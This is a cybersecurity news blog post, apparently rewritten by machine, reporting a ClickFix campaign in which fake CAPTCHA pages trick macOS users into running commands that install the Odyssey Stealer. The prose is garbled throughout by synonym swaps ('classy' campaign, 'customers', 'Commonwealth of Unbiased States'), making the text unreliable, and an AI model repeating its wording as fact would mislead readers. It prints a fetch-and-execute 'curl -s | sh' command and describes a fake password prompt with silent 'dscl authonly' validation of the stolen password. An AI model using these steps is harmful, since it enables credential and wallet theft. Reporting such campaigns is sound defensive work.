Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Threat Actors Employ Clickfix Tactics to Deliver Malicious AppleScripts That Steal Login Credentials

Posted on June 27, 2025June 27, 2025 By CWS

A classy new malware marketing campaign focusing on macOS customers has emerged, using misleading “Clickfix” ways to distribute malicious AppleScripts designed to reap delicate consumer credentials and monetary information.

The marketing campaign leverages typosquatted domains that intently mimic authentic finance platforms and Apple App Retailer web sites, making a convincing facade that tips customers into executing harmful instructions on their programs.

The assault begins when customers inadvertently go to malicious domains that current faux Cloudflare-style CAPTCHA prompts.

These seemingly authentic verification pages instruct macOS customers to repeat and paste Base64-encoded instructions into their terminal functions to show they don’t seem to be robots.

As soon as executed, these instructions provoke a complete information theft operation that targets browser credentials, cryptocurrency wallets, and delicate private data saved throughout a number of functions.

Cyfirma researchers recognized this malware because the Odyssey Stealer, a rebranded model of the beforehand identified Poseidon Stealer that itself originated as a fork of the AMOS Stealer.

The analysis crew uncovered a number of command-and-control panels linked to this exercise, with infrastructure primarily hosted in Russia.

The malware demonstrates a transparent choice for focusing on customers in Western nations, notably the USA and European Union, whereas conspicuously avoiding victims in Commonwealth of Unbiased States nations.

The Odyssey Stealer represents a regarding evolution in macOS-targeting malware, combining social engineering ways with subtle technical capabilities.

Not like conventional malware that depends on software program vulnerabilities, this marketing campaign exploits human psychology by presenting customers with familiar-looking safety prompts that seem like routine verification procedures.

The attackers have rigorously crafted their distribution web sites to reflect trusted platforms, making detection notably difficult for unsuspecting customers.

An infection Mechanism and Payload Execution

The malware’s an infection mechanism depends on a multi-stage course of that begins with area typosquatting and culminates in complete system compromise.

ClickFix distribution move (Supply – Cyfirma)

When customers go to the malicious domains, they encounter professionally designed pages that replicate the looks of authentic CAPTCHA verification programs.

The faux immediate shows directions for macOS customers to execute a command that seems as follows:-

curl -s | sh

This command retrieves and executes an AppleScript from the attacker’s command-and-control server. The script employs alphanumeric obfuscation to cover perform names, although evaluation reveals its true goal.

Upon execution, the malware creates a short lived listing construction utilizing the mkdir command, particularly establishing /tmp/lovemrtrump as its operational base.

The AppleScript then shows a convincing authentication immediate designed to seize the consumer’s system password.

To validate stolen credentials silently, it leverages the macOS dscl command with the authonly parameter, guaranteeing the verification course of stays hidden from the consumer.

This method permits the malware to verify password validity with out triggering system alerts or consumer suspicion, demonstrating the attackers’ deep understanding of macOS safety mechanisms.

Examine reside malware conduct, hint each step of an assault, and make quicker, smarter safety choices -> Attempt ANY.RUN now

Cyber Security News Tags:Actors, AppleScripts, ClickFix, Credentials, Deliver, Employ, Login, Malicious, Steal, Tactics, Threat

Post navigation

Previous Post: RevEng.ai Raises $4.15 Million to Secure Software Supply Chain
Next Post: Chinese Group Silver Fox Uses Fake Websites to Deliver Sainbox RAT and Hidden Rootkit

Related Posts

Realtek Vulnerability Let Attackers Trigger DoS Attack via Bluetooth Secure Connections Pairing Process Cyber Security News
Hackers Attacking Apache Tomcat Manager From 400 Unique IPs Cyber Security News
CISA Warns of Citrix NetScaler ADC and Gateway Vulnerability Actively Exploited in Attacks Cyber Security News
New Sophisticated Attack Bypasses Content Security Policy Using HTML-Injection Technique Cyber Security News
Hackers Advertising New Nytheon AI Blackhat Tool on popular Hacking Forums Cyber Security News
Malicious Python Package Mimic as Attacking Discord Developers With Malicious Remote Commands Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • NightEagle APT Exploits Microsoft Exchange Flaw to Target China’s Military and Tech Sectors
  • In Other News: Hacker Helps Kill Informants, Crylock Developer Sentenced, Ransomware Negotiator Probed
  • Critical HIKVISION ApplyCT Vulnerability Exposes Devices to Code Execution Attacks
  • Multiple PHP Vulnerabilities Allow SQL Injection & DoS Attacks
  • Massive Android Ad Fraud ‘IconAds’ Leverages Google Play to Attack Phone Users

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • NightEagle APT Exploits Microsoft Exchange Flaw to Target China’s Military and Tech Sectors
  • In Other News: Hacker Helps Kill Informants, Crylock Developer Sentenced, Ransomware Negotiator Probed
  • Critical HIKVISION ApplyCT Vulnerability Exposes Devices to Code Execution Attacks
  • Multiple PHP Vulnerabilities Allow SQL Injection & DoS Attacks
  • Massive Android Ad Fraud ‘IconAds’ Leverages Google Play to Attack Phone Users

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News